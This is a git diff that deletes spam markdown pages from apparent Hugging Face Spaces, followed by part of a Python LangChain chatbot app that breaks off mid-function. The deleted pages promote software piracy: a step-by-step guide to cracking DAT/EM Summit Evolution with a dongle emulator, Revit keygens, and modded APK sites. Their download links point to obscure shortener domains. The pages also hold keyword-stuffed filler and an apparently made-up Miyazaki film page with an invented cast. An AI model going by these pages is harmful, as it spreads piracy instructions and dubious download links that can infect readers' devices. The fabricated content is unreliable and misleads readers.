diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md deleted file mode 100644 index b2bfce21b0571477d9407d6dfa05233521dd0085..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/B Ampr Automation Studio 4 Download Crack.md +++ /dev/null @@ -1,22 +0,0 @@ - -

How to Download and Install B&R Automation Studio 4

-

B&R Automation Studio 4 is a software tool that allows you to design, program, test and debug automation systems. It supports a wide range of hardware platforms, such as PLCs, industrial PCs, servo drives, HMIs and more. With B&R Automation Studio 4, you can create modular and reusable software components, use graphical editors for logic and motion control, simulate your system before deployment, and benefit from integrated diagnostics and troubleshooting features.

-

b&r automation studio 4 download crack


Download ===== https://byltly.com/2uKz3Z



-

If you want to download and install B&R Automation Studio 4 on your computer, you need to follow these steps:

-
    -
  1. Go to the official website of B&R Industrial Automation at https://www.br-automation.com/ and click on the "Downloads" tab.
  2. -
  3. Under the "Software" section, find the link for "B&R Automation Studio 4" and click on it.
  4. -
  5. You will be redirected to a page where you can choose the version and language of B&R Automation Studio 4 that you want to download. You can also check the system requirements and the release notes for each version.
  6. -
  7. After selecting your preferences, click on the "Download" button and save the file to your computer.
  8. -
  9. Once the download is complete, run the file and follow the instructions on the screen to install B&R Automation Studio 4 on your computer.
  10. -
  11. You may need to restart your computer after the installation is finished.
  12. -
  13. To launch B&R Automation Studio 4, go to the Start menu and look for the B&R folder. Then, click on the "B&R Automation Studio 4" icon.
  14. -
-

Congratulations! You have successfully downloaded and installed B&R Automation Studio 4 on your computer. You can now start creating your own automation projects with this powerful software tool.

- -

B&R Automation Studio 4 is based on the IEC 61131-3 standard, which defines five programming languages for automation systems: Ladder Diagram (LD), Function Block Diagram (FBD), Structured Text (ST), Instruction List (IL) and Sequential Function Chart (SFC). You can use any of these languages or combine them to create your software components. You can also use C/C++ or ANSI C for more complex tasks.

-

B&R Automation Studio 4 also provides graphical editors for motion control, such as Motion Chart and CAM Editor. These editors allow you to define the motion profiles and trajectories of your servo axes, as well as synchronize them with other axes or events. You can also use the integrated PLCopen motion function blocks to implement standard motion functions, such as homing, positioning, gearing and camming.

-

-

B&R Automation Studio 4 enables you to simulate your system before deploying it to the hardware. You can use the Simulation Runtime feature to run your software components on your computer and test their functionality and performance. You can also use the Simulation View feature to visualize the behavior of your system in a 3D environment. You can import CAD models of your machine or plant and connect them to your software components. This way, you can verify the kinematics and dynamics of your system and detect any errors or collisions.

ddb901b051
-
-
\ No newline at end of file diff --git a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md b/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md deleted file mode 100644 index 4c30acde4e772771a8c8a228f0f8566bd373a688..0000000000000000000000000000000000000000 --- a/spaces/1acneusushi/gradio-2dmoleculeeditor/data/Datem Summit Evolution Crack Para How to Get the Latest Version of the 3D Stereo Software.md +++ /dev/null @@ -1,121 +0,0 @@ - -

How to Crack DAT/EM Summit Evolution for Free

-

DAT/EM Summit Evolution is a powerful software package that allows you to discover and capture 3D information from stereo data. The software includes CAD and GIS interfaces, 3D stereo vector superimposition, automated feature editing, contour generation, and many other tools. It is used by professionals in fields such as mapping, surveying, engineering, geology, forestry, and archaeology.

-

However, DAT/EM Summit Evolution is not cheap software. Depending on the product level and the modules you need, it can cost thousands of dollars. That's why some people may want to crack it and use it for free. Cracking is the process of modifying or bypassing the protection mechanisms of a piece of software to make it work without a license or a dongle.

-

datem summit evolution crack para


DOWNLOAD ►►►►► https://byltly.com/2uKvQF



-

But cracking DAT/EM Summit Evolution is not an easy task. It requires advanced skills in reverse engineering, programming, debugging, etc. It also involves many risks and challenges such as legal issues, malware infections, compatibility problems, functionality limitations, etc. On the other hand, using a cracked version of DAT/EM Summit Evolution can also have some benefits such as saving money, testing the software before buying it, accessing features that are not available in your product level, etc.

-

In this article, we will show you how to find and download a crack for DAT/EM Summit Evolution, how to use a cracked version of the software, and what are the pros and cons of doing so. We will also provide some alternatives and recommendations for legal and ethical use of the software. Please note that this article is for educational purposes only and we do not condone or encourage piracy or illegal use of any software.

-

How to Find and Download a Crack for Summit Evolution

-

The first step to crack DAT/EM Summit Evolution is to find and download a crack for it. A crack is usually a file or a program that modifies or replaces some parts of the original software to make it work without a license or a dongle. There are many websites that offer cracks for various software online, but not all of them are trustworthy or reliable.

-

Some websites may try to scam you by asking you to pay money or provide personal information before downloading a crack. Some websites may infect your computer with malware or viruses that can harm your system or steal your data. Some websites may provide fake or outdated cracks that do not work or cause errors.

-

Therefore, you need to be careful and cautious when looking for cracks online. Here are some tips on how to avoid scams and malware when searching for cracks:

- -

One example of a website that claims to provide a crack for DAT/EM Summit Evolution is Brain Studio (https://www.brstudio.com/wf/news/summit-evolution-dongle-emulator.html). According to this website, they offer a Sentinel SuperPro/UltraPro Dongle Emulator that can emulate the dongle protection of DAT/EM Summit Evolution v6.3 - v8.0. They also claim that their emulator can include all possible modules of the software.

-

We cannot verify the authenticity or safety of this website or their crack. Therefore, we advise you to use it at your own risk and discretion. If you decide to download their crack, you need to follow their instructions on how to install and run it on your computer.

-

How to Use a Cracked Version of Summit Evolution

-

The second step to crack DAT/EM Summit Evolution is to use a cracked version of the software. A cracked version of DAT/EM Summit Evolution is a modified version of the original software that works without a license or a dongle. Depending on the type and quality of the crack you have downloaded, you may be able to access different features and modules of the software.

-

datem summit evolution dongle emulator
-datem summit evolution stereo data capture
-datem summit evolution professional edition
-datem summit evolution orthorectification tools
-datem summit evolution 3d vector superimposition
-datem summit evolution contour generation features
-datem summit evolution v8.0 x64 bit download
-datem summit evolution v7.6 patch update
-datem summit evolution v7.4 sentinel superpro
-datem summit evolution v6.3 user manual
-datem summit evolution lite edition free trial
-datem summit evolution mobile edition for field work
-datem summit evolution uas edition for drone imagery
-datem summit evolution point cloud application
-datem summit evolution sample data elevation model
-datem summit evolution propack bundle offer
-datem summit evolution cad and gis interfaces
-datem summit evolution automated feature editing
-datem summit evolution terrain visualization options
-datem summit evolution model generator tutorial
-datem summit evolution stereo viewer operation guide
-datem summit evolution capture interface for autocad
-datem summit evolution superimposition for microstation
-datem summit evolution arcgis integration tips
-datem summit evolution global mapper compatibility
-datem summit evolution 3d information discovery
-datem summit evolution feature collection level
-datem summit evolution orientation measurement module
-datem summit evolution feature verification process
-datem summit evolution release notes and brochures
-datem summit evolution help and troubleshooting support
-datem summit evolution drivers and manuals download
-datem summit evolution license activation code
-datem summit evolution system requirements and specifications
-datem summit evolution customer reviews and testimonials
-datem summit evolution product comparison and pricing
-datem summit evolution training and certification courses
-datem summit evolution online demo and webinar registration
-datem summit evolution case studies and success stories
-datem summit evolution news and events updates

-

DAT/EM Summit Evolution is available in five product levels: Professional, Feature Collection, Lite, Mobile, and UAS. Each product level has different capabilities and functionalities depending on your needs and preferences.

| Product Level | Description |
| --- | --- |
| Professional | The most comprehensive product level that includes orientation measurement, orthorectification, terrain visualization, contour generation, point translation, DTM collection, and more. |
| Feature Collection | A product level that focuses on feature collection from stereo data using CAD and GIS interfaces. It does not include orientation measurement, orthorectification, or terrain visualization. |
| Lite | A product level that provides 3D stereo viewing capabilities for resource specialists, GIS technicians, and QA professionals. It does not include feature collection tools. |
| Mobile | A product level that optimizes 3D stereo viewing capabilities for field applications using laptops or tablets. It also works on desktop computers. |
| UAS | A product level that specializes in 3D viewing and simple 3D digitizing from UAS orthophotos. It does not include orientation measurement, orthorectification, or terrain visualization. |
-

If you have downloaded a crack that can include all possible modules of DAT/EM Summit Evolution, you may be able to use any product level you want. However, if you have downloaded a crack that only works for a specific product level, you may be limited by its features and functions.

-

To use a cracked version of DAT/EM Summit Evolution, you need to follow these steps:

-
    -
  1. Launch the crack file or program on your computer. This may require administrator privileges or password depending on your system settings.
  2. -
  3. Select the product level and modules you want to use from the crack interface. This may vary depending on the type and quality of the crack you have downloaded.
  4. -
  5. Launch DAT/EM Summit Evolution from your desktop shortcut or start menu. The software should start without asking for a license or dongle verification.
  6. -
  7. Access and manipulate stereo data from various sources such as aerial photos, satellite images, lidar data, etc. You can use various tools such as Capture™ interface, DAT/EM SuperImposition™, Summit Model Generator™, etc. to digitize features directly into AutoCAD®, MicroStation®, ArcGIS®, or Global Mapper®.
  8. -

    Summit Evolution Feature Collection is a product level that focuses on feature collection from stereo data using CAD and GIS interfaces. It does not include orientation measurement, orthorectification, or terrain visualization.

    -

    Summit Evolution Lite is a product level that provides 3D stereo viewing capabilities for resource specialists, GIS technicians, and QA professionals. It does not include feature collection tools.

    -

    Summit Evolution Mobile is a product level that optimizes 3D stereo viewing capabilities for field applications using laptops or tablets. It also works on desktop computers.

    -

    Summit Evolution UAS is a product level that specializes in 3D viewing and simple 3D digitizing from UAS orthophotos. It does not include orientation measurement, orthorectification, or terrain visualization.

    -
  9. How does Summit Evolution compare to other stereo photogrammetry software?
  10. -

Summit Evolution is one of the leading stereo photogrammetry packages on the market. It has many advantages over other software, such as:

    - -

    However, Summit Evolution also has some disadvantages compared to other software such as:

    - -
  11. What are the system requirements for running Summit Evolution?
  12. -

    The system requirements for running Summit Evolution vary depending on the product level and modules you use. However, the minimum system requirements for running any product level of Summit Evolution are:

    - -
  13. How can I get technical support for Summit Evolution?
  14. -

    If you have any questions or issues with Summit Evolution, you can contact the technical support team of DAT/EM Systems International by:

    - -
  15. Where can I learn more about Summit Evolution and its applications?
  16. -

    If you want to learn more about Summit Evolution and its applications, you can visit the official website of DAT/EM Systems International at https://www.datem.com/. There you can find more information about the software features, product levels, modules, pricing, etc. You can also download the official documentation, tutorials, webinars, etc. that can help you understand and use the software better.

    -

    0a6ba089eb
    -
    -
    \ No newline at end of file diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md b/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md deleted file mode 100644 index 062c409d72da0da72ee0e1fcc4074a1c68cc8666..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Autodesk Revit 2018 Crack WORK Keygen XForce Free Download.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Autodesk Revit 2018 Crack Keygen XForce Free Download


    Download Zip >>>>> https://imgfil.com/2uxYIB



    -
    - 3cee63e6c2
    -
    -
    -

    diff --git a/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md b/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md deleted file mode 100644 index a21a32b61d0ca5e1bfa326772408c537fcbbc07b..0000000000000000000000000000000000000000 --- a/spaces/1gistliPinn/ChatGPT4/Examples/Fireflies Movie English Subtitles Download !!LINK!! Torrent.md +++ /dev/null @@ -1,22 +0,0 @@ - -

    How to Watch Fireflies Movie with English Subtitles Online

    -

    Fireflies is a 2022 animated film directed by Hayao Miyazaki and produced by Studio Ghibli. It tells the story of a young boy who befriends a mysterious girl who can communicate with fireflies. The film has received critical acclaim and has been nominated for several awards, including the Academy Award for Best Animated Feature.

    -

    Fireflies Movie English Subtitles Download Torrent


    Download Zip ☆☆☆ https://imgfil.com/2uy1ve



    -

If you want to watch the Fireflies movie with English subtitles online, you have a few options. One of them is to download the torrent file from a reliable source and use a torrent client to stream or download the movie. However, this method may be illegal in some countries and may expose you to malware or viruses. Therefore, we do not recommend this option.

    -

A safer and more legal way to watch the Fireflies movie with English subtitles online is to use a streaming service that offers the film. Some of the streaming services that carry Fireflies with English subtitles are:

    - -

These are some of the best ways to watch the Fireflies movie with English subtitles online. We hope you enjoy this beautiful and touching film.

    -

    - -

    If you are looking for a more in-depth analysis of Fireflies movie, you may want to read some of the reviews that have been written by critics and fans. One of the reviews that we found helpful is from The Hollywood Reporter, which praises the film's visuals and themes. According to the review[^1^], Fireflies does a good job of rendering port locations that are vast and unfriendly by day and depopulated and ghostly by night, both moods being entirely appropriate. The review also notes that the film explores the themes of exile, identity, and belonging with sensitivity and nuance.

    -

Fireflies is a masterpiece of animation that will touch your heart and make you think. Whether you watch it online or in a theater, you will not regret spending your time on this film. We hope you enjoy the Fireflies movie with English subtitles as much as we did.

    - -

The Fireflies movie also boasts an impressive cast of voice actors who bring the characters to life. The film features the voices of Ryan Reynolds, Willem Dafoe, Emily Watson, Carrie-Anne Moss, Julia Roberts, Ioan Gruffudd and Kate Mara[^1^]. They deliver emotional and nuanced performances that capture the personalities and struggles of their roles.

    -

Another aspect of the Fireflies movie that deserves praise is the music. The film features a beautiful and haunting score composed by Joe Hisaishi, who has collaborated with Hayao Miyazaki on many of his previous films. The music enhances the mood and atmosphere of the film, creating a sense of wonder and melancholy. The film also features a song by Yoko Ono, who wrote it specifically for the film.

    -

Fireflies is a rare gem of animation that will stay with you long after you watch it. It is a film that celebrates the power of imagination, friendship and love in the face of adversity. It is a film that challenges you to think about the meaning of life and the value of human connection. It is a film that will make you laugh, cry and smile.

    d5da3c52bf
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md b/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md deleted file mode 100644 index ba47a1b21ffbfb250c214250f9c25f3f513c866e..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download Free and Unlimited Android Mods with APKMODEL.md +++ /dev/null @@ -1,75 +0,0 @@ - -

    APKMODEL: The Ultimate Source for Modded Games and Apps for Android

    -

    If you are an Android user who loves playing games and using apps on your device, you might have heard of apkmodel. But what is apkmodel and why should you use it? In this article, we will answer these questions and show you how apkmodel can enhance your gaming and app experience.

    -

    What is APKMODEL?

    -

    APKMODEL is a website that offers modded games and apps for Android devices.

    -

    Modded games and apps are modified versions of the original ones that have extra features, unlocked content, unlimited resources, or other enhancements. For example, you can play a modded version of Subway Surfers with unlimited coins and keys, or a modded version of Spotify with premium features for free.

    -

    apkmodel


    Download === https://jinyurl.com/2uNKDW



    -

    Modded games and apps are not available on the official Google Play Store, but you can download them from apkmodel.

    -

    Apkmodel is a website that hosts thousands of modded games and apps from various categories and genres, such as action, adventure, arcade, puzzle, simulation, sports, music, photography, social media, and more. You can find popular titles like Minecraft, Clash of Clans, Candy Crush Saga, TikTok, Instagram, Netflix, and many others on apkmodel.

    -

    Why use APKMODEL?

    -

    APKMODEL has many benefits for Android users who want to enjoy their favorite games and apps without any limitations or restrictions.

    -

    APKMODEL provides a large collection of modded games and apps from various categories and genres.

    -

    Whether you are looking for a game to kill some time, an app to enhance your productivity, or a tool to customize your device, you can find it on apkmodel. You can also discover new games and apps that you might not have heard of before.

    -

    APKMODEL updates its content regularly and ensures that the mods are safe, tested, and working.

    -

    Apkmodel keeps up with the latest trends and releases in the gaming and app industry and adds new mods every day. You can also request mods that are not available on the website and they will try to provide them as soon as possible. Moreover, apkmodel checks all the mods for viruses, malware, and compatibility issues before uploading them to the website.

    -

    APKMODEL has a user-friendly interface and easy download process.

    -

    Apkmodel has a simple and intuitive design that makes it easy to navigate and find what you are looking for. You can also use the search bar or filter by category to narrow down your options. To download a modded game or app, you just need to click on the download button and wait for the file to be downloaded to your device. You don't need to sign up, log in, or provide any personal information.

    -

    apkmodel modded games
    -apkmodel android apps
    -apkmodel free download
    -apkmodel latest version
    -apkmodel premium apk
    -apkmodel mod menu
    -apkmodel unlimited money
    -apkmodel pro apk
    -apkmodel hacked games
    -apkmodel cracked apps
    -apkmodel online games
    -apkmodel offline games
    -apkmodel action games
    -apkmodel adventure games
    -apkmodel arcade games
    -apkmodel casual games
    -apkmodel puzzle games
    -apkmodel racing games
    -apkmodel role playing games
    -apkmodel simulation games
    -apkmodel sports games
    -apkmodel strategy games
    -apkmodel social apps
    -apkmodel entertainment apps
    -apkmodel productivity apps
    -apkmodel photography apps
    -apkmodel video apps
    -apkmodel music apps
    -apkmodel education apps
    -apkmodel health apps
    -apkmodel lifestyle apps
    -apkmodel shopping apps
    -apkmodel travel apps
    -apkmodel news apps
    -apkmodel books apps
    -apkmodel communication apps
    -apkmodel finance apps
    -apkmodel personalization apps
    -apkmodel tools apps
    -apkmodel weather apps

    -

    APKMODEL respects the privacy and security of its users and does not require any registration or personal information.

    -

    Apkmodel does not collect, store, or share any data from its users. You can use the website anonymously and safely without worrying about your privacy or security. Apkmodel also does not host any ads or pop-ups that might annoy you or harm your device.

    -

    How to use APKMODEL?

    -

    Using APKMODEL is simple and straightforward. Here are the steps to follow:

    -

    Step 1: Visit the APKMODEL website and browse through the categories or use the search bar to find the game or app you want.

    -

    Apkmodel has a well-organized and easy-to-use website that allows you to find your desired modded game or app in no time. You can explore the different categories, such as action, arcade, casual, strategy, role-playing, etc., or use the search bar to type in the name of the game or app you are looking for.

    -

    Step 2: Click on the download button and wait for the file to be downloaded to your device.

    -

    Once you have found the modded game or app you want, you can click on the download button and choose the version you prefer. Some mods may have different versions with different features or compatibility options. You can also read the description, features, installation guide, and user reviews of the mod before downloading it. The download process is fast and easy, and you don't need to go through any surveys or verification steps.

    -

    Step 3: Install the modded game or app by enabling the unknown sources option in your settings.

    -

    After downloading the modded game or app, you need to install it on your device. To do that, you need to enable the unknown sources option in your settings. This option allows you to install apps from sources other than the Google Play Store. To enable it, go to Settings > Security > Unknown Sources and toggle it on. Then, locate the downloaded file in your file manager and tap on it to install it.

    -

    Step 4: Enjoy your modded game or app with all the features and benefits.

    -

    Now you are ready to enjoy your modded game or app with all the features and benefits that it offers. You can play unlimited levels, unlock premium content, get unlimited resources, remove ads, and more. You can also update your modded game or app whenever a new version is available on apkmodel.

    -

    Conclusion

    -

    APKMODEL is a great source for modded games and apps for Android users who want to have more fun and convenience with their devices.

    -

    Apkmodel is a website that provides thousands of modded games and apps for Android devices that have extra features, unlocked content, unlimited resources, or other enhancements. Apkmodel has many benefits for Android users, such as a large collection of mods from various categories and genres, regular updates, safe and tested mods, user-friendly interface, easy download process, privacy and security protection, and no ads or pop-ups. Using apkmodel is simple and straightforward; you just need to visit the website, find the modded game or app you want, download it, install it, and enjoy it. Apkmodel is the ultimate source for modded games and apps for Android users who want to have more fun and convenience with their devices.

FAQs

Q: Is apkmodel legal?

A: Apkmodel is legal as long as you use it for personal and educational purposes only. However, some modded games and apps may violate the terms and conditions of the original developers or publishers. Therefore, we advise you to use apkmodel at your own risk and discretion.

Q: Is apkmodel safe?

A: Apkmodel is safe as long as you download mods from its official website only. Apkmodel checks all the mods for viruses, malware, and compatibility issues before uploading them to the website. However, some mods may require additional permissions or access to your device's functions or data. Therefore, we advise you to read the description, features, installation guide, and user reviews of the mod before downloading it.

Q: How can I request a mod that is not available on apkmodel?

A: Apkmodel welcomes requests from its users for mods that are not available on its website. You can request a mod by filling out a form on its website or by contacting its support team via email or social media.

Q: How can I update my modded game or app?

A: Apkmodel updates its mods regularly and notifies its users whenever a new version is available. You can update your modded game or app by downloading the latest version from apkmodel and installing it over the previous one. You can also check the update history and changelog of the mod on its website.

Q: How can I uninstall my modded game or app?

A: You can uninstall your modded game or app by following the same steps as you would for any other app on your device. Go to Settings > Apps > Select the modded game or app > Uninstall. You can also delete the downloaded file from your file manager.

Q: How can I contact apkmodel or give feedback?

A: Apkmodel values the opinions and suggestions of its users and welcomes any feedback or questions. You can contact apkmodel or give feedback by using the contact form on its website or by emailing them at support@apkmodel.com. You can also follow them on Facebook, Twitter, Instagram, and YouTube for the latest news and updates.
    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md b/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md deleted file mode 100644 index 70e69c656d9787ff9acf4d881ee0ea09e86af6b5..0000000000000000000000000000000000000000 --- a/spaces/1phancelerku/anime-remove-background/Download Nada Dering WA Tiktok Suara Google BTS Chagiya dan Lainnya.md +++ /dev/null @@ -1,76 +0,0 @@ - -

    How to Download and Use TikTok Sounds as WhatsApp Notifications

    -

    TikTok is a popular social media app that allows users to create and share short videos with various effects and sounds. WhatsApp is a widely used messaging app that lets users send text, voice, image, video, and audio messages. If you are a fan of both apps, you might want to use some of the catchy or funny sounds from TikTok as your WhatsApp notifications. This way, you can spice up your chats and calls with your friends and family.

    -

    In this article, we will show you how to download and use TikTok sounds as WhatsApp notifications in a few simple steps. You will need a smartphone, an internet connection, a TikTok downloader website, and of course, both TikTok and WhatsApp apps installed on your phone.

    -

    download notifikasi wa tiktok


    DOWNLOAD ->>> https://jinyurl.com/2uNMAd



    -

    How to Download TikTok Sounds

    -

    Find and Copy the Link of the TikTok Video

    -

    The first step is to find a TikTok video that has a sound that you like and want to use as your WhatsApp notification. You can browse through different categories, hashtags, or trends on TikTok, or search for specific keywords or users. Once you find a video that you like, tap on the share icon at the bottom right corner of the screen. Then, tap on Copy link to copy the link of the video to your clipboard.

    -

    Paste the Link into a TikTok Downloader Website

    -

    The next step is to use a TikTok downloader website to download the video as an MP3 file. There are many websites that offer this service for free, such as TiktokDownloader, MusicallyDown, or SnapTik. All you have to do is paste the link of the video that you copied into the input box on these websites and click on Download. Then, choose Download MP3 from the options that appear.

    -

    Save the MP3 File to Your Phone

    -

    The final step is to save the downloaded MP3 file to your phone's storage. Depending on your browser settings, you might be asked where you want to save the file or it might be saved automatically in your Downloads folder. You can also rename the file if you want.

    -

    How to Use TikTok Sounds as WhatsApp Notifications

    -

    Move the MP3 File to the Ringtones Folder

    -

    Before you can use the TikTok sound as your WhatsApp notification, you need to move it to the Ringtones folder on your phone so that it can be used as a notification sound. To do this, you can use a file manager app on your phone, such as Files by Google, ES File Explorer, or File Manager. Open the app and locate the MP3 file that you downloaded. Then, long-press on the file and select Move or Cut. Navigate to the Ringtones folder on your phone, which is usually under Internal storage > Ringtones. Then, tap on Paste or Move here to move the file to the Ringtones folder.

    -

    Open WhatsApp and Go to Settings

    -

    Now that you have moved the TikTok sound to the Ringtones folder, you can use it as your WhatsApp notification. To do this, open WhatsApp and tap on the three dots icon at the top right corner of the screen. Then, tap on Settings from the menu that appears. This will open the Settings menu of WhatsApp.

    -

    Download nada dering wa tiktok viral
    -Cara download sound tiktok ke wa jadi nada dering lucu
    -Download notifikasi wa chagiya tiktok viral lucu dan imut
    -Download kumpulan nada dering wa pendek dari tiktok
    -Download nada dering wa bts dari lagu-lagu tiktok
    -Download nada dering wa suara google dari tiktok
    -Download nada dering wa doraemon baling-baling bambu dari tiktok
    -Download nada dering wa ayam dj lucu jawa dari tiktok
    -Download nada dering wa minion beatbox dari tiktok
    -Download nada dering wa lel funny dari tiktok
    -Download nada dering wa bahasa sunda dari tiktok
    -Download nada dering wa bahasa jawa dari tiktok
    -Download nada dering wa hihi hahah dari tiktok
    -Download nada dering wa intro dari tiktok
    -Download nada dering wa suara air jatuh dari tiktok
    -Download nada dering wa ketuk pintu dari tiktok
    -Download nada dering wa lucu super mario dari tiktok
    -Download nada dering wa lucu orang batuk dari tiktok
    -Download nada dering wa sahur suara google dari tiktok
    -Download nada dering wa nani ohayo yang viral di tiktok
    -Download nada dering wa dynamite bts yang viral di tiktok
    -Download nada dering wa morning call bts yang viral di tiktok
    -Download nada dering wa jungkook bts yang viral di tiktok
    -Download nada dering wa v bts yang viral di tiktok
    -Download nada dering wa jimin bts yang viral di tiktok
    -Download nada dering wa rm bts yang viral di tiktok
    -Download nada dering wa jin bts yang viral di tiktok
    -Download nada dering wa suga bts yang viral di tiktok
    -Download nada dering wa j-hope bts yang viral di tiktok
    -Download nada dering wa korea imut yang viral di tiktok
    -Download nada dering wa mobile legends yang viral di tiktok
    -Download nada dering wa harvest moon yang viral di tiktok
    -Download nada dering wa kata sayang yang viral di tiktok
    -Download nada dering wa 1 detik yang viral di tiktok
    -Cara membuat notifikasi wa pakai suara sendiri dari tiktok
    -Cara mengganti notifikasi wa dengan mp3 dari tiktok
    -Cara download notifikasi wa di jalantikus dari tiktok
    -Aplikasi download notifikasi wa terbaik dari tiktok
    -Kumpulan ringtone wa terbaik lainnya dari tiktok
    -Tips memilih notifikasi wa yang sesuai dengan kepribadian dari tiktok

    -

    Choose the Notification Sound that You Want to Change

    -

    In the Settings menu, tap on Notifications to access the notification settings of WhatsApp. Here, you can choose between message, call, or group notifications and customize them according to your preferences. For example, if you want to change the notification sound for messages, tap on Notification tone under Message notifications. This will open a list of available notification tones on your phone.

    -

    Select the TikTok Sound from the List

    -

    In the list of notification tones, scroll down until you find the TikTok sound that you downloaded and moved to the Ringtones folder. It should have the same name as the MP3 file that you saved. Tap on it to select it as your notification tone for messages. You can also preview the sound by tapping on the play icon next to it. Once you are satisfied with your choice, tap on OK to save it.

    -

    Conclusion

    -

    Congratulations! You have successfully downloaded and used a TikTok sound as your WhatsApp notification. You can repeat the same steps for any other TikTok sound that you like and use it for different types of notifications on WhatsApp. You can also share your TikTok sounds with your friends and family by sending them the MP3 files or the links of the videos. This way, you can have fun and express yourself with TikTok sounds on WhatsApp.

    -

    FAQs

    -

    Q: Can I use TikTok sounds as my phone's ringtone?

    -

    A: Yes, you can use TikTok sounds as your phone's ringtone by following the same steps as above, but instead of choosing Notification tone, choose Phone ringtone in the Settings menu of WhatsApp.

    -

    Q: Can I use TikTok sounds as my alarm sound?

    -

    A: Yes, you can use TikTok sounds as your alarm sound by following the same steps as above, but instead of moving the MP3 file to the Ringtones folder, move it to the Alarms folder on your phone.

    -

    Q: How can I delete a TikTok sound from my phone?

    -

    A: If you want to delete a TikTok sound from your phone, you can use a file manager app to locate and delete the MP3 file from your phone's storage. You can also go to the Settings menu of WhatsApp and choose Reset notification settings to restore the default notification sounds.

    -

    Q: How can I edit a TikTok sound before using it as my WhatsApp notification?

    -

    A: If you want to edit a TikTok sound before using it as your WhatsApp notification, you can use an audio editor app on your phone, such as MP3 Cutter and Ringtone Maker, Ringtone Maker, or Audio MP3 Cutter Mix Converter and Ringtone Maker. These apps allow you to trim, cut, merge, mix, or add effects to your audio files.

    -

    Q: How can I find more TikTok sounds that I like?

    -

    A: If you want to find more TikTok sounds that you like, you can explore different categories, hashtags, or trends on TikTok, or search for specific keywords or users. You can also follow your favorite creators or celebrities on TikTok and see what sounds they use in their videos.

    401be4b1e0
    -
    -
    \ No newline at end of file diff --git a/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py b/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py deleted file mode 100644 index 87b5486b7f06de16378f15bd8882589f935e3a40..0000000000000000000000000000000000000000 --- a/spaces/ADOPLE/Multi-Doc-Virtual-Chatbot/app.py +++ /dev/null @@ -1,202 +0,0 @@ -from pydantic import NoneStr -import os -from langchain.chains.question_answering import load_qa_chain -from langchain.document_loaders import UnstructuredFileLoader -from langchain.embeddings.openai import OpenAIEmbeddings -from langchain.llms import OpenAI -from langchain.text_splitter import CharacterTextSplitter -from langchain.vectorstores import FAISS -from langchain.vectorstores import Chroma -from langchain.chains import ConversationalRetrievalChain -import gradio as gr -import openai -from langchain import PromptTemplate, OpenAI, LLMChain -import validators -import requests -import mimetypes -import tempfile - -class Chatbot: - def __init__(self): - openai.api_key = os.getenv("OPENAI_API_KEY") - def get_empty_state(self): - - """ Create empty Knowledge base""" - - return {"knowledge_base": None} - - def create_knowledge_base(self,docs): - - """Create a knowledge base from the given documents. - Args: - docs (List[str]): List of documents. - Returns: - FAISS: Knowledge base built from the documents. - """ - - # Initialize a CharacterTextSplitter to split the documents into chunks - # Each chunk has a maximum length of 500 characters - # There is no overlap between the chunks - text_splitter = CharacterTextSplitter( - separator="\n", chunk_size=1000, chunk_overlap=200, length_function=len - ) - - # Split the documents into chunks using the text_splitter - chunks = text_splitter.split_documents(docs) - - # Initialize an OpenAIEmbeddings model to compute embeddings of the chunks - embeddings = OpenAIEmbeddings() - - # Build a knowledge base using Chroma from the chunks and their embeddings - knowledge_base = Chroma.from_documents(chunks, embeddings) - - # Return the resulting knowledge base - return knowledge_base - - - def upload_file(self,file_paths): - """Upload a file and create a knowledge base from its contents. - Args: - file_paths : The files to uploaded. - Returns: - tuple: A tuple containing the file name and the knowledge base. 
- """ - - file_paths = [i.name for i in file_paths] - print(file_paths) - - - loaders = [UnstructuredFileLoader(file_obj, strategy="fast") for file_obj in file_paths] - - # Load the contents of the file using the loader - docs = [] - for loader in loaders: - docs.extend(loader.load()) - - # Create a knowledge base from the loaded documents using the create_knowledge_base() method - knowledge_base = self.create_knowledge_base(docs) - - - # Return a tuple containing the file name and the knowledge base - return file_paths, {"knowledge_base": knowledge_base} - - def add_text(self,history, text): - history = history + [(text, None)] - print("History for Add text : ",history) - return history, gr.update(value="", interactive=False) - - - - def upload_multiple_urls(self,urls): - urlss = [url.strip() for url in urls.split(',')] - all_docs = [] - file_paths = [] - for url in urlss: - if validators.url(url): - headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',} - r = requests.get(url,headers=headers) - if r.status_code != 200: - raise ValueError("Check the url of your file; returned status code %s" % r.status_code) - content_type = r.headers.get("content-type") - file_extension = mimetypes.guess_extension(content_type) - temp_file = tempfile.NamedTemporaryFile(suffix=file_extension, delete=False) - temp_file.write(r.content) - file_path = temp_file.name - file_paths.append(file_path) - - loaders = [UnstructuredFileLoader(file_obj, strategy="fast") for file_obj in file_paths] - - # Load the contents of the file using the loader - docs = [] - for loader in loaders: - 